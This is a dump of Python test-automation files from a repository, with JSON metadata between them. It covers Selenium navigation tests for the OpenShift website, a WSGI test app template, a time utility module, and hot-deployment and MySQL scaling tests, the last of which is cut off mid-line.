baseutils.check_title(self,\"OpenShift by Red Hat | Cloud Platform\")\n time.sleep(5)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_xpath(self,\"//a[contains(text(),'Express')]\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Express\")\n\n def test_aa_check_flex_nav_bar(self):\n baseutils.go_to_home(self)\n baseutils.click_element_by_xpath(self,\"//a[contains(text(),'Flex')]\")\n time.sleep(5)\n baseutils.check_title(self,\"OpenShift by Red Hat | Flex\")\n \n # baseutils.click_element_by_link_text(self,\"POWER\")\n # baseutils.check_title(self,\"OpenShift by Red Hat | Power\")\n\n def test_ab_check_community_nav_bar(self):\n baseutils.go_to_home(self)\n baseutils.click_element_by_xpath(self,\"//a[contains(text(),'Community')]\")\n time.sleep(5) \n baseutils.check_title(self,\"Red Hat OpenShift Community\")\n baseutils.go_back(self)\n time.sleep(5)\n baseutils.click_element_by_link_text(self,\"Sign in\")\n baseutils.is_element_displayed(self,By.ID,\"login-form\")\n # baseutils.check_title(self,\"OpenShift by Red Hat | Sign in to OpenShift\")\n \n\n def test__b_check_home_links(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.click_element_by_xpath(self,\"//img[@alt='OpenShift Logo']\")\n time.sleep(5)\n baseutils.check_title(self,\"OpenShift by Red Hat\")\n baseutils.scroll_bar(self)\n baseutils.click_element_by_xpath(self,\"//section[@id='opener']/div/a\")\n time.sleep(5)\n if not baseutils.is_element_displayed(self,By.ID,\"signup\"):\n baseutils.click_element_by_xpath(self,\"//section[@id='opener']/div/a\")\n# baseutils.check_title(self,\"OpenShift by Red Hat | Sign up for OpenShift\")\n baseutils.click_element_by_css_no_wait(self,\"#signup > a.close_button > img\")\n baseutils.click_element_by_xpath(self,\"//section[@id='bottom_signup']/div/a\")\n# baseutils.check_title(self,\"OpenShift by Red Hat | Sign up for OpenShift\")\n time.sleep(5)\n baseutils.is_element_displayed(self,By.ID,\"signup\")\n \n\n def test_c_check_home_contents(self):\n baseutils.go_to_home(self)\n baseutils.assert_element_present_by_xpath(self,\"//img[@alt='OpenShift Logo']\")\n baseutils.assert_text_equal_by_css(self,\"GO BEYOND THE CLOUDS\",\"div.content > header > hgroup > h1\")\n baseutils.assert_text_equal_by_css(self,\"JAVA PHP RUBY PYTHON PERL\",\"div.content > header > hgroup > h2\")\n# baseutils.assert_element_present_by_xpath(self,\"//img[@alt='Panda pilot, soaring through the clouds!']\")\n baseutils.assert_text_equal_by_css(self,\"WHAT IS OPENSHIFT?\",\"#exposition > header > h1\")\n baseutils.assert_text_equal_by_css(self,\"OpenShift is a free, auto-scaling platform-as-a-service for Java, Ruby, PHP, Perl and Python applications.\",\"#intro\")\n baseutils.assert_element_present_by_css(self,\"img.icon\")\n baseutils.assert_text_equal_by_xpath(self,\"WHY USE OPENSHIFT?\",\"//section[@id='exposition']/header[2]/h1\")\n baseutils.assert_text_equal_by_css(self,\"Time of the essence? Just upload code and go!\",\"header > h2\")\n baseutils.assert_text_equal_by_xpath(self,\"Whether you prefer the command line or a browser-based interface, OpenShift provides the fastest and easiest on-ramp to the cloud for free.\",\".//*[@id='fast']/p\")\n baseutils.assert_text_equal_by_css(self,\"Experiencing growing pains? OpenShift is tailored to meet your needs.\",\"#free > header > h2\") \n baseutils.assert_text_equal_by_xpath(self,\"OpenShift adapts to the varying needs of your app with auto-scaling built-in. No need for complicated scripts or additional coding.\",\".//*[@id='free']/p\")\n baseutils.assert_element_present_by_css(self,\"#free > img.icon\")\n baseutils.assert_element_present_by_css(self,\"#open > img.icon\")\n baseutils.assert_text_equal_by_css(self,\"Don't get locked in! Choose your languages, frameworks, middleware and clouds.\",\"#open > header > h2\")\n baseutils.assert_text_equal_by_css(self,\"Keep your options open. OpenShift is based on Open Source with support for Java, PHP, Ruby, Python, and Perl and more.\",\"#open > p\")\n\n def test_da_check_home_twitter(self):\n baseutils.go_to_home(self)\n baseutils.assert_element_present_by_xpath(self,\".//*[@id='latest']/a/img\")\n baseutils.assert_element_present_by_xpath(self,\".//*[@id='latest']/p\")\n # baseutils.assert_element_present_by_css(self,\"li > img.avatar\")\n # baseutils.assert_element_present_by_css(self,\"li > p.tweet\")\n baseutils.assert_element_present_by_xpath(self,\".//*[@id='retweets']/ul/li[*]/a/img\")\n baseutils.assert_element_present_by_xpath(self,\"//div[@id='retweets']/ul/li[*]/p\")\n # baseutils.assert_element_present_by_xpath(self,\"//div[@id='retweets']/ul/li[2]/img\")\n # baseutils.assert_element_present_by_xpath(self,\"//div[@id='retweets']/ul/li[2]/p\")\n # baseutils.assert_element_present_by_xpath(self,\"//div[@id='retweets']/ul/li[3]/img\")\n # baseutils.assert_element_present_by_xpath(self,\"//div[@id='retweets']/ul/li[4]/img\")\n # baseutils.assert_element_present_by_xpath(self,\"//div[@id='retweets']/ul/li[4]/p\")\n \n baseutils.scroll_by(self)\n if config.proxy:\n baseutils.click_element_by_xpath(self,\"//*[@id='social_links']/a[1]\")\n time.sleep(5)\n baseutils.check_title(self,\"Twitter / Search - openshift\")\n baseutils.go_back(self)\n else: \n baseutils.assert_element_present_by_link_text(self,\"More #openshift buzz\")\n baseutils.assert_element_present_by_xpath(self,\"//a[contains(text(),'Follow @OpenShift')]\")\n \n def test_e_check_header_announcements(self):\n baseutils.go_to_home(self)\n baseutils.assert_element_present_by_xpath(self,\".//*[@id='announcements']/ul/li[*]/a\")\n # baseutils.is_element_displayed(self,By.XPATH,\".//*[@id='announcements']/ul/li[1]/a\")\n baseutils.click_element_by_xpath_wait(self,\".//*[@id='announcements']/ul/li[*]/a\")\n if self.driver.title == \"OpenShift Newsletter Signup\": pass\n elif self.driver.title == \"Red Hat OpenShift (openshift) on Twitter\":pass\n else: baseutils.assert_text_equal_by_xpath(self,\"Got a cool app? Tell us about it!\",\".//*[@id='announcements']/ul/li[3]/a/div[1]\")\n baseutils.check_title(self,\"OpenShift Newsletter Signup\")\n baseutils.go_back(self)\n baseutils.is_element_displayed(self,By.XPATH,\".//*[@id='announcements']/ul/li[2]/a\")\n baseutils.click_element_by_xpath_no_wait(self,\".//*[@id='announcements']/ul/li[2]/a\")\n time.sleep(5)\n baseutils.check_title(self,\"Red Hat OpenShift (openshift) on Twitter\")\n baseutils.go_back(self)\n baseutils.is_element_displayed(self,By.XPATH,\"//aside[@id='announcements']/ul/li[3]/a\")\n baseutils.assert_text_equal_by_xpath(self,\"Got a cool app? Tell us about it!\",\".//*[@id='announcements']/ul/li[3]/a/div[1]\")\n \n def test_f_check_home_footer(self):\n baseutils.go_to_home(self)\n baseutils.assert_text_equal_by_css(self,\"News\",\"li > header > h2\")\n baseutils.click_element_by_xpath(self,\"//a[contains(text(),'Announcements')]\")\n baseutils.check_title(self,\"News and Announcements | Red Hat OpenShift Community\")\n baseutils.go_back(self)\n baseutils.click_element_by_xpath(self,\"//a[contains(text(),'Blog')]\")\n baseutils.check_title(self,\"OpenShift Blog | Red Hat OpenShift Community\")\n baseutils.go_back(self)\n if config.proxy:\n baseutils.click_element_by_xpath(self,\"//a[@href='http://www.twitter.com/#!/openshift']\")\n baseutils.check_title(self,\"Red Hat OpenShift (openshift) on Twitter\")\n baseutils.go_back(self)\n else: baseutils.assert_element_present_by_xpath(self,\"//a[@href='http://www.twitter.com/#!/openshift']\")\n baseutils.assert_text_equal_by_xpath(self,\"Community\",\"//li[2]/header/h2\")\n baseutils.click_element_by_xpath(self,\"//a[contains(text(),'Forum')]\")\n baseutils.check_title(self,\"Forums | Red Hat OpenShift Community\")\n baseutils.go_back(self)\n baseutils.click_element_by_xpath(self,\"//a[contains(text(),'Partner Program')]\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Meet Our Partners\")\n baseutils.go_back(self)\n baseutils.click_element_by_xpath(self,\"//a[@href='http://webchat.freenode.net/?randomnick=1&channels=openshift&uio=d4']\")\n baseutils.check_title(self,\"Connection details - freenode Web IRC\")\n baseutils.go_back(self)\n baseutils.assert_element_present_by_link_text(self,\"Feedback\")\n baseutils.assert_text_equal_by_xpath(self,\"Legal\",\"//li[3]/header/h2\")\n baseutils.click_element_by_xpath(self,\"//a[contains(@href, '/app/legal')]\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Terms and Conditions\")\n baseutils.go_back(self)\n baseutils.click_element_by_xpath(self,\"//a[contains(@href, '/app/legal/openshift_privacy')]\")\n baseutils.check_title(self,\"OpenShift by Red Hat | OpenShift Privacy Statement\")\n baseutils.go_back(self)\n baseutils.click_element_by_xpath(self,\"//a[contains(@href, 'https://access.redhat.com/security/team/contact/')]\")\n baseutils.check_title(self,\"access.redhat.com | Security contacts and procedures\")\n baseutils.go_back(self)\n baseutils.assert_text_equal_by_xpath(self,\"Help\",\"//li[4]/header/h2\")\n baseutils.click_element_by_xpath(self,\"//a[@href='http://www.redhat.com/openshift/faq']\")\n baseutils.check_title(self,\"Frequently Asked Questions | Red Hat OpenShift Community\")\n baseutils.go_back(self)\n baseutils.assert_element_present_by_xpath(self,\"//a[contains(text(),'Contact')]\")\n\n\n def test_g_check_legal_links(self):\n baseutils.go_to_legal(self)\n baseutils.click_element_by_xpath(self,\"//a[contains(text(),'OpenShift Preview Services Agreement')]\")\n baseutils.check_title(self,\"OpenShift by Red Hat | OpenShift Preview Services Agreement\")\n baseutils.go_back(self)\n baseutils.click_element_by_xpath(self,\"//a[contains(text(),'Acceptable Use Policy')]\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Acceptable Use Policy\")\n baseutils.go_back(self)\n baseutils.click_element_by_xpath(self,\"//a[contains(text(),'Privacy Policy')]\")\n baseutils.check_title(self,\"OpenShift by Red Hat | OpenShift Privacy Statement\")\n baseutils.go_back(self)\n baseutils.click_element_by_xpath(self,\"//a[contains(text(),'Terms of Use')]\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Terms of Use\")\n baseutils.go_back(self)\n \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n \n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.614814817905426, "alphanum_fraction": 0.619259238243103, "avg_line_length": 37.57143020629883, "blob_id": "bd1d21444947325ad6864036ac94a49b94c192fe", "content_id": "e95d23c011134fc5458f1f83ae2c7cd613adcc1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1350, "license_type": "no_license", "max_line_length": 154, "num_lines": 35, "path": "/automation/open/testmodules/RT/cartridge/app_template/universal/python/application", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport commands\nfrom cgi import escape\nfrom urlparse import parse_qs\n\nvirtenv = os.environ['APPDIR'] + '/virtenv/'\nos.environ['PYTHON_EGG_CACHE'] = os.path.join(virtenv, 'lib/python2.6/site-packages')\nvirtualenv = os.path.join(virtenv, 'bin/activate_this.py')\ntry:\n execfile(virtualenv, dict(__file__=virtualenv))\nexcept IOError:\n pass\n#\n# IMPORTANT: Put any additional includes below this line. If placed above this\n# line, it's possible required libraries won't be in your searchable path\n# \n\ndef application(environ, start_response):\n params = parse_qs(environ.get('QUERY_STRING', ''))\n ctype = 'text/plain'\n if environ['PATH_INFO'] == '/health':\n response_body = \"1\"\n elif environ['PATH_INFO'] == '/env':\n response_body = ['%s=%s' % (key, value)\n for key, value in sorted(os.environ.items())]\n response_body = '\\n'.join(response_body)\n else:\n response_body = \"Usage: %s/<group>\\nValid groups are 'shell', 'mongodb', 'mysql', 'postgresql', 'env'\" % (os.environ['OPENSHIFT_APP_DNS'])\n\n status = '200 OK'\n response_headers = [('Content-Type', ctype), ('Content-Length', str(len(response_body)))]\n #\n start_response(status, response_headers)\n return [response_body]\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 32, "blob_id": "1ce42ae14787cc8d9cc98fbe9cd9cf36de0eef45", "content_id": "ae35cf6dc276244eaf60fbb4ba1ac5c5eddaf33d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 100, "license_type": "no_license", "max_line_length": 59, "num_lines": 3, "path": "/automation/open/testmodules/Collections/Demo/__init__.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "# place holder do we can do immports.\n\n### this directory holds a collection of top level testcase \n" }, { "alpha_fraction": 0.6207822561264038, "alphanum_fraction": 0.6491522789001465, "avg_line_length": 24.44871711730957, "blob_id": "16a5056cbfc6b6dea86934f668d6813c4893a122", "content_id": "7bd13b576eaec3ec6156c20d44594f9bb25aa6f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5957, "license_type": "no_license", "max_line_length": 85, "num_lines": 234, "path": "/automation/open/lib/timelib.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4:softtabstop=0:smarttab\n# License: LGPL\n# Keith Dart <[email protected]>\n\n\"\"\"\nTime related functions. You can use this in place of the stock 'time' module.\nIt adds some additional time related functions, and a MutableTime class.\n\n\"\"\"\n\n\nfrom time import *\nnow = time\n\n# Python time tuple:\n# Index Attribute Values \n# 0 tm_year (for example, 1993)\n# 1 tm_mon range [1,12]\n# 2 tm_mday range [1,31]\n# 3 tm_hour range [0,23]\n# 4 tm_min range [0,59]\n# 5 tm_sec range [0,61]; see (1) in strftime() description\n# 6 tm_wday range [0,6], Monday is 0\n# 7 tm_yday range [1,366]\n# 8 tm_isdst 0, 1 or -1; see below\n\n# for some reason the Python time module uses a struct_time that is read only.\n# So, this time class mirrors it, but this can have different elements set. It\n# also extends it with logical time functionality.\nclass MutableTime(object):\n\tINDEXMAP = {\"tm_year\":0, \"tm_mon\":1, \"tm_mday\":2, \"tm_hour\":3, \"tm_min\":4,\n\t\t\t\"tm_sec\":5, \"tm_wday\":6, \"tm_yday\":7, \"tm_isdst\":8,\n\t\t\t# more \"rememberable\" names...\n\t\t\t\"year\":0, \"month\":1, \"day\":2, \"hour\":3, \"minute\":4,\n\t\t\t\"second\":5, \"weekday\":6, \"yday\":7, \"isdst\":8 }\n\n\tdef __init__(self, init=None, fmt=None):\n\t\tif init is None:\n\t\t\tself._tm = [0, 0, 0, 0, 0, 0, 0, 0, 0]\n\t\telse:\n\t\t\tself._tm = list(init)\n\t\t\tassert len(self._tm) == 9\n\t\tself._fmt = fmt or \"%a %b %d %H:%M:%S %Y\"\n\n\tdef __repr__(self):\n\t\treturn \"%s(%r, %r)\" % (self.__class__.__name__, self._tm, self._fmt)\n\n\tdef __str__(self):\n\t\treturn strftime(self._fmt, self._tm)\n\n\tdef __iter__(self):\n\t\treturn iter(self._tm)\n\n\tdef __float__(self):\n\t\treturn mktime(self._tm)\n\n\tdef __int__(self):\n\t\treturn int(self.__float__())\n\n\tdef __coerce__(self, other):\n\t\ttry:\n\t\t\treturn mktime(self._tm), float(other)\n\t\texcept:\n\t\t\treturn None\n\n\tdef __len__(self):\n\t\treturn len(self._tm)\n\n\tdef __eq__(self, other):\n\t\treturn list(self) == list(other)\n\n\tdef __getitem__(self, idx):\n\t\treturn self._tm[idx]\n\n\tdef __setitem__(self, idx, val):\n\t\tself._tm[idx] = int(val)\n\n\tdef __getattribute__(self, key):\n\t\ttry:\n\t\t\treturn object.__getattribute__(self, key)\n\t\texcept AttributeError:\n\t\t\ttry:\n\t\t\t\treturn self._tm[self.INDEXMAP[key]]\n\t\t\texcept KeyError:\n\t\t\t\traise AttributeError, \"no attribute '%s' found.\" % (key,)\n\n\tdef __setattr__(self, name, val):\n\t\tidx = self.INDEXMAP.get(name, None)\n\t\tif idx is None:\n\t\t\tobject.__setattr__(self, name, val)\n\t\telse:\n\t\t\tself._tm[idx] = int(val)\n\n\tdef __sub__(self, other):\n\t\treturn mktime(self._tm) - mktime(tuple(other))\n\n\tdef __add__(self, secs):\n\t\tnew = self.__class__(self._tm[:], self._fmt)\n\t\tnew.add_seconds(secs)\n\t\treturn new\n\n\tdef __mul__(self, other):\n\t\treturn mktime(self._tm) * float(other)\n\n\tdef __div__(self, other):\n\t\treturn mktime(self._tm) / float(other)\n\n\tdef __iadd__(self, secs):\n\t\tcsec = mktime(self._tm)\n\t\tcsec += secs\n\t\tself._tm = localtime(csec)\n\t\treturn self\n\n\tdef __isub__(self, secs):\n\t\tcsec = mktime(self._tm)\n\t\tcsec -= secs\n\t\tself._tm = localtime(csec)\n\t\treturn self\n\t\n\tdef copy(self):\n\t\treturn self.__class__(self._tm, self._fmt)\n\n\tdef localtime(self, secs=None):\n\t\tif secs: # must do it this way because these functions check arg length, not value.\n\t\t\tself._tm = list(localtime(secs))\n\t\telse:\n\t\t\tself._tm = list(localtime())\n\t\treturn self\n\n\tdef gmtime(self, secs=None):\n\t\tif secs:\n\t\t\tself._tm = list(gmtime(secs))\n\t\telse:\n\t\t\tself._tm = list(gmtime())\n\t\treturn self\n\n\tdef strftime(self, fmt=None):\n\t\treturn strftime(fmt or self._fmt, self._tm)\n\n\tdef strptime(self, val, fmt=None):\n\t\tttl = list(strptime(val, fmt or self._fmt))\n\t\tttl[-1] = localtime()[-1] # preserve dstflag - bug workaround\n\t\tself._tm = ttl\n\t\treturn self\n\n\tdef set_format(self, fmt):\n\t\tself._fmt = str(fmt)\n\n\tdef add_seconds(self, secs):\n\t\tself.__iadd__(secs)\n\n\tdef add_minutes(self, mins):\n\t\tself.add_seconds(mins*60)\n\n\tdef add_hours(self, hours):\n\t\tself.add_seconds(hours*3600)\n\n\tdef add(self, minutes=0, hours=0, days=0, weeks=0):\n\t\tself.add_seconds(seconds(minutes, hours, days, weeks))\n\n\tdef add_time(self, timediff):\n\t\t\"\"\"add_time(timediff) Adds specificed amount of time to the current\n\t\ttime held in this object. The format of difftime is a string,\n\t\t\"HH:MM:SS\".\"\"\"\n\t\t[h, m, s] = map(int, timediff.split(\":\"))\n\t\tself.add_seconds(h*3600+m*60+s)\n\n\n# time module equivalents that return MutableTime objects.\ndef localtime_mutable(secs=None):\n\tmt = MutableTime()\n\tmt.localtime(secs)\n\treturn mt\n\ndef gmtime_mutable(secs=None):\n\tmt = MutableTime()\n\tmt.gmtime(secs)\n\treturn mt\n\ndef strptime_mutable(string, fmt=None):\n\tmt = MutableTime(fmt=fmt)\n\tmt.strptime(string)\n\treturn mt\n\ndef weekof(secs=None):\n\t\"\"\"Returns a date that is the Monday of the week specified in universal seconds.\"\"\"\n\tif secs is None:\n\t\tsecs = time()\n\tsecs = ((secs // 604800)*604800)-172800\n\treturn localtime(secs)\n\n\ndef seconds(minutes=0, hours=0, days=0, weeks=0):\n\t\"\"\"Returns a value in seconds given some minutes, hours, days, or weeks.\"\"\"\n\treturn minutes*60 + hours*3600 + days*86400 + weeks*604800\n\ndef HMS(secs):\n\t\"\"\"Return tuple of hours, minutes, and seconds given value in seconds.\"\"\"\n\tminutes, seconds = divmod(secs, 60.0)\n\thours, minutes = divmod(minutes, 60.0)\n\treturn hours, minutes, seconds\n\ndef HMS2str(hours, minutes, seconds):\n\treturn \"%02.0f:%02.0f:%02.2f\" % (hours, minutes, seconds)\n\ndef timestamp(fmt=\"%a, %d %b %Y %H:%M:%S +0000\"):\n\t\"\"\"Return string with current time, according to given format. Default is\nrfc822 compliant date value.\"\"\"\n\treturn strftime(fmt, gmtime())\ngmtimestamp = timestamp\nrfc822time = timestamp\n\ndef localtimestamp(fmt=\"%a, %d %b %Y %H:%M:%S %Z\", tm=None):\n\t\"\"\"Return string with current time, according to given format. Default is\nrfc822 compliant date value.\"\"\"\n\treturn strftime(fmt, tm or localtime())\n\n\nif __name__ == \"__main__\":\n\tmt = localtime_mutable()\n\tprint mt\n\tmt.add_seconds(3600)\n\tprint mt\n\tprint strftime(\"%Y-%m-%d\", weekof(time()))\n\n\tt = now()\n\tfor d in range(1, 60):\n\t\tweek = weekof(t+(d*60*60*24))\n\t\tprint MutableTime(week)\n\t\n\tprint \"Local time:\"\n\tprint localtimestamp()\n\n\n" }, { "alpha_fraction": 0.5349794030189514, "alphanum_fraction": 0.5412417054176331, "avg_line_length": 33.28834533691406, "blob_id": "d38a373791339e3a46ac71b778f56bd3f204badf", "content_id": "5794825d40b73ff4bb977c767e4061ceb928a7ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5589, "license_type": "no_license", "max_line_length": 107, "num_lines": 163, "path": "/automation/open/testmodules/RT/hot_deploy/hot_deploy_test.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nJul 25, 2012\n\nThis is the super class for hot-deployment testing\n\"\"\"\n\nimport rhtest\nimport common\nimport OSConf\nimport pexpect\nimport re\nfrom openshift import Openshift\nfrom shutil import rmtree\nfrom time import sleep\n\nclass HotDeployTest(rhtest.Test):\n \n def log_info(self, message):\n self.info(\"===========================\")\n self.info(message)\n self.info(\"===========================\")\n \n def initialize(self):\n self.log_info(\"Initializing...\")\n common.env_setup()\n # Creating the application\n\tself.app_type = self.config.application_type\n\tself.app_name = self.config.application_name\n common.create_app(\n self.config.application_name,\n self.config.application_type,\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd,\n clone_repo = True,\n git_repo = \"./\" + self.config.application_name,\n scalable = self.config.scalable\n )\n \n # Checking the application URL\n status, res = self.config.rest_api.app_get(self.config.application_name)\n if status == 'OK':\n self.config.application_url = res['app_url']\n else:\n self.config.applicaton_url = 'Not found'\n\n self.info(\"Application URL: \" + self.config.application_url)\n \n \n def finalize(self):\n self.log_info(\"Finalizing...\")\n rmtree(\"./%s\" % self.config.application_name)\n \n def enable_jenkins(self):\n self.log_info(\"Enabling Jenkins if it's necessary\")\n if self.config.jenkins_is_needed:\n common.create_app(\n \"jenkins\",\n common.app_types['jenkins'],\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd,\n clone_repo = False\n )\n common.embed(\n self.config.application_name, \n \"add-\" + common.cartridge_types[\"jenkins\"],\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd\n )\n \n def enable_hot_deployment(self):\n self.log_info(\"Enabling hot deployment support\")\n marker = open(\"./%s/.openshift/markers/hot_deploy\" % self.config.application_name, \"a\")\n marker.write(\"\\n\")\n marker.close()\n \n def configuration(self):\n # Setting up the code to retrieve process ID\n # It must be overriden\n pass\n \n# def get_process_id(self):\n# self.log_info(\"Getting the process ID\")\n# return int(common.fetch_page(\"%s/%s\" % ( self.config.application_url, self.config.file_name )))\n def get_process_id(self):\n pids = []\n if self.app_type.split('-')[0] in ('jbossas', 'jbosseap'):\n cmd = \"ssh %s 'ps aux |grep -v grep| grep -i standalone'\" % (OSConf.get_ssh_url(self.app_name))\n elif 'jbossews' in self.app_type:\n cmd = \"ssh %s 'ps aux |grep -v grep| grep 'jre'\" % (OSConf.get_ssh_url(self.app_name))\n else:\n cmd = \"ssh %s 'ps aux |grep -v grep| grep bin/httpd'\" % (OSConf.get_ssh_url(self.app_name))\n child = pexpect.spawn(cmd)\n\tprint \">>\"*50\n\tprint cmd\n\tprint \"<<\"*50\n for line in child.readlines():\n match = None\n if self.app_type.split('-')[0] in ('jbossas', 'jbosseap'):\n if 'jre' in line or 'standalone.sh' in line:\n print line\n match = re.search(r'^\\d+\\s+(\\d+)', line, re.M)\n elif 'jbossews' in self.app_type:\n if 'java' in line:\n match = re.search(r'^\\d+\\s+(\\d+)', line, re.M)\n else:\n if 'httpd -C Include' in line:\n match = re.search(r'^\\d+\\s+(\\d+)', line, re.M)\n if match:\n if match.group(1) not in pids:\n pids.append(int(match.group(1)))\n pids.sort()\n return pids\n\n\n def deploy(self):\n deployment_steps = [\n \"cd %s\" % self.config.application_name,\n \"git add .\",\n \"git commit -a -m 'Adding test file'\",\n \"git push\"\n ]\n ret_code = common.command_get_status(\" && \".join(deployment_steps))\n self.info(\"Waiting for the application...\")\n sleep(30) # Waiting 30 minutes for the application\n return ret_code\n \n def deploy_changes(self):\n self.log_info(\"Modifying local git repo and push\")\n steps = [\n \"cd %s\" % self.config.application_name,\n \"touch %s\" % common.getRandomString()\n ]\n common.command_get_status(\" && \".join(steps))\n return self.deploy()\n \n def verification(self, lst1, lst2):\n if len(lst1) > len(lst2):\n return False\n for i in range(len(lst1)):\n if lst1[i] != lst2[i]:\n return False\n# return True\n# self.info(\"PID1: %d\" % pid1)\n# self.info(\"PID2: %d\" % pid2)\n# self.assert_equal(pid1[], pid2)\n # Everything is OK\n return self.passed(self.config.summary)\n \n def test_method(self):\n self.enable_jenkins()\n self.enable_hot_deployment()\n self.configuration()\n pid_original = self.get_process_id()\n self.deploy_changes()\n pid_latter = self.get_process_id()\n\tprint \">>\"*50\n\tprint \"pid_original : %s\"%pid_original\n\tprint \"pid_later : %s\"%pid_latter\n\tprint \"<<\"*50\n return self.verification(pid_original, pid_latter)\n" }, { "alpha_fraction": 0.6774553656578064, "alphanum_fraction": 0.6902901530265808, "avg_line_length": 23.83333396911621, "blob_id": "321a681c8286732baec64a8069ebc3a61f5ba7b5", "content_id": "07120f8bdbf937e5646290eaab6033aefba8f744", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1792, "license_type": "no_license", "max_line_length": 100, "num_lines": 72, "path": "/automation/open/lib/supports/XML/pythonPOM.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4\n# License: LGPL\n# Keith Dart <[email protected]>\n\nfrom __future__ import generators\n\n\"\"\"\nUsed to make more efficient the use of POM for the python code generation and\nanalysis. \n\n\"\"\"\n\nimport XML.POM as POM\n\n# base class for all python parse tree elements. Since all are the same. Also\n# adds some query methods.\nclass TokenNode(POM.ElementNode):\n\tATTLIST = POM.AttributeList([POM.XMLAttribute('value', 1, 12, None)])\n\t_name = \"TokenNode\"\n\nclass SymbolNode(POM.ElementNode):\n\tCONTENTMODEL = POM.ContentModel(POM.ANY)\n\tATTLIST = POM.AttributeList([POM.XMLAttribute('value', 1, 12, None)])\n\t_name = \"SymbolNode\"\n\nclass PythonSource(POM.POMDocument):\n\tHEADER = '<?xml version=\"1.0\" encoding=\"iso-8859-1\"?>\\n<!DOCTYPE file_input SYSTEM \"python.dtd\">\\n'\n\n\tdef get_leaf_values(self, n, elclass, line_info=0):\n\t\tfor cn in gen_leaf_nodes(n, elclass):\n\t\t\tif line_info:\n\t\t\t\tyield (cn.value, cn.lineno)\n\t\t\telse:\n\t\t\t\tyield cn.value\n\n\tdef strings(self, node=None, line_info=0):\n\t\t\"\"\"Strings([node])\nA generator function that iterates over string literal values in a document tree. \"\"\"\n\t\tn = node or self.root\n\t\treturn self.get_leaf_values(n, self.dtd.STRING, line_info)\n\n\tdef funcdefs(self, node=None, line_info=0):\n\t\tn = node or self.root\n\t\treturn self.get_leaf_values(n, self.dtd.funcdef, line_info)\n\n\nclass PyNodeIterator(object):\n\tdef __init__(self, node, elclass):\n\t\tself.l = node.getall(elclass, 100)\n\t\tself.i = 0\n\n\tdef __iter__(self):\n\t\treturn self\n\n\tdef next(self):\n\t\ttry:\n\t\t\tv = self.l[self.i].value\n\t\texcept IndexError:\n\t\t\traise StopIteration\n\t\tself.i += 1\n\t\treturn v\n\n\ndef gen_leaf_nodes(node, elclass):\n\tif isinstance(node, elclass):\n\t\tyield node\n\tfor child in node.get_children():\n\t\tfor cn in gen_leaf_nodes(child, elclass):\n\t\t\tyield cn\n\treturn\n\n\n\n\n" }, { "alpha_fraction": 0.5832825899124146, "alphanum_fraction": 0.5875431299209595, "avg_line_length": 34.97810363769531, "blob_id": "42c190ce7e31df6cd26141a277682f02f2054061", "content_id": "872e97641131587c7741177e4d354c52267673a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4929, "license_type": "no_license", "max_line_length": 134, "num_lines": 137, "path": "/automation/open/testmodules/RT/scaling/ruby_scaling_mysql.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport testcase, common, OSConf\nimport rhtest\n# user defined packages\nimport fileinput\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = 'myruby' + common.getRandomString(5)\n try:\n variant = self.get_variant()\n except:\n variant = 'ruby'\n self.app_type = common.app_types[variant]\n self.info(\"VARIANT: %s\"%variant)\n common.env_setup()\n self.domain_name = common.get_domain_name()\n self.steps_list = []\n\n def finalize(self):\n pass\n \nclass RubyMysqlScaling(OpenShiftTest):\n def check_mysql_result(self):\n app_url = OSConf.get_app_url(self.app_name)\n return common.grep_web_page(\"http://%s/mysql\" % app_url, \"Tim Bunce, Advanced Perl DBI\", \"-H 'Pragma: no-cache'\", 5, 6)\n\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\n \"Create a scalable %s app: %s\" % (self.app_type, self.app_name),\n common.create_app,\n function_parameters = [self.app_name, self.app_type, self.user_email, self.user_passwd, True, \"./\" + self.app_name, True],\n expect_description = \"App should be created successfully\",\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"embed mysql to %s\" % self.app_name,\n common.embed,\n expect_description = \"Embedding mysql should pass\",\n function_parameters = [ self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.user_email, self.user_passwd ],\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Copy template files\",\n \"cp %s/cartridge/app_template/mysql/config.ru 